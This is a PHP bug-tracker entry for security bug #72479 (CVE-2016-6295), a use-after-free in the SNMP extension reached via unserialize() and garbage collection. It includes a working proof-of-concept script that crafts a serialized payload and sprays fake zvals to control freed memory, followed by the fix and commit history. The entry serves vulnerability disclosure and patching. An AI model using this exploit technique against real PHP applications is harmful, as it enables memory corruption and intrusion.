php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #72479 Use After Free Vulnerability in SNMP with GC and unserialize()
Submitted: 2016-06-23 14:39 UTC Modified: 2016-07-25 15:20 UTC
From: taoguangchen at icloud dot com Assigned: stas (profile)
Status: Closed Package: SNMP related
PHP Version: 5.5.37 OS: *
Private report: No CVE-ID: 2016-6295
View Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
If you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: taoguangchen at icloud dot com
New email:
PHP Version: OS:

 

 [2016-06-23 14:39 UTC] taoguangchen at icloud dot com
Description:
------------
Use After Free Vulnerability in SNMP with GC and unserialize()

This bug is similar to bug#72434:

PoC:
```
<?php

$arr = [1, [1, 2, 3, 4, 5], 3, 4, 5];
$poc = 'a:3:{i:1;N;i:2;O:4:"snmp":1:{s:11:"quick_print";'.serialize($arr).'}i:1;R:7;}';
$out = unserialize($poc);
gc_collect_cycles();
$fakezval = ptr2str(1122334455);
$fakezval .= ptr2str(0);
$fakezval .= "\x00\x00\x00\x00";
$fakezval .= "\x01";
$fakezval .= "\x00";
$fakezval .= "\x00\x00";
for ($i = 0; $i < 5; $i++) {
    $v[$i] = $fakezval.$i;
}
var_dump($out[1]);

function ptr2str($ptr)
{
    $out = '';
    for ($i = 0; $i < 8; $i++) {
        $out .= chr($ptr & 0xff);
        $ptr >>= 8;
    }
    return $out;
}

?>
```

Expected result:
```
int(1)
```

Actual result:
```
int(1122334455)
```

Fix:
```
}
/* }}} */

+static HashTable *php_snmp_get_gc(zval *object, zval ***gc_data, int *gc_data_count TSRMLS_DC) /* {{{ */
+{
+	*gc_data = NULL;
+	*gc_data_count = 0;
+	return zend_std_get_properties(object TSRMLS_CC);
+}
+/* }}} */

/* {{{ php_snmp_get_properties(zval *object)
   Returns all object properties. Injects SNMP properties into object on first call */
static HashTable *php_snmp_get_properties(zval *object TSRMLS_DC)
{
...
	php_snmp_object_handlers.has_property = php_snmp_has_property;
+	php_snmp_object_handlers.get_gc = php_snmp_get_gc;
	php_snmp_object_handlers.get_properties = php_snmp_get_properties;
```


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-06-27 01:08 UTC] stas@php.net
-PHP Version: Irrelevant +PHP Version: 5.5.37 -Assigned To: +Assigned To: stas
 [2016-06-27 01:08 UTC] stas@php.net
Added fix as cab1c3b3708eead315e033359d07049b23b147a3 and https://gist.github.com/035a95208257aed53e7221275d57a231
 [2016-07-19 07:47 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=cab1c3b3708eead315e033359d07049b23b147a3
Log: Fixed bug #72479 - same as #72434
 [2016-07-19 07:47 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-07-19 07:53 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=cab1c3b3708eead315e033359d07049b23b147a3
Log: Fixed bug #72479 - same as #72434
 [2016-07-19 08:39 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=cab1c3b3708eead315e033359d07049b23b147a3
Log: Fixed bug #72479 - same as #72434
 [2016-07-19 08:55 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=cab1c3b3708eead315e033359d07049b23b147a3
Log: Fixed bug #72479 - same as #72434
 [2016-07-25 15:20 UTC] remi@php.net
-CVE-ID: +CVE-ID: 2016-6295
 [2016-10-17 10:11 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=cab1c3b3708eead315e033359d07049b23b147a3
Log: Fixed bug #72479 - same as #72434
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Wed Oct 09 10:01:27 2024 UTC